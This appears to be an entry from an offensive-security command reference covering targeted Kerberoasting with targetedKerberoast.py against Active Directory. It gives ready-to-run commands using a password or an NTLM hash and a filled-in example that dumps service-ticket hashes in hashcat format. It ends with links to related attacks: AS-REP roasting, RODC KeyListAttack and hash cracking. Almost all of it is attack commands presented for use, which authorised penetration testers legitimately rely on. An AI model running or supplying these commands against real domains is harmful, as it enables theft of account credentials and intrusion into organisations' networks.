Targeted Kerberoast
Targeted Kerberoasting attack on specific accounts
- Tool
- python
- Category
- Credential Attacks / Kerberoasting
- Platform
- cross-platform
- Requires
- password
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
python targetedKerberoast.py -v --dc-ip '<ip>' -u '<user>' -p '<password>' -d '<domain>' -f hashcat -o targeted_kerberoasting.hash
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
python targetedKerberoast.py -v --dc-ip '<ip>' -u '<user>' -H '<hash>' -d '<domain>' -f hashcat -o targeted_kerberoasting.hash
Examples
python targetedKerberoast.py -v --dc-ip '192.168.1.100' -u 'user' -p 'password' -d 'CORP.LOCAL' -f hashcat -o targeted_kerberoasting.hash
Tags
Related commands
- Hashcat Kerberoast Crack Crack Kerberoasting hashes
- Impacket AS-REP Roast AS-REP Roasting for accounts without Kerberos Pre-Authentication
- Impacket Get TGT Get TGT to be used in Kerberos authentication
- Impacket Kerberoast Extract service account hashes via Kerberoasting
- Impacket KeyListAttack Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on…
- Impacket Targeted Kerberoast Request a TGS only for a specific service account instead of every kerberoastable user…
- NetExec LDAP AS-REP Roasting Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to…
- NetExec LDAP Kerberoasting Request TGS tickets for every account with a SPN and write hashes to a file ready for…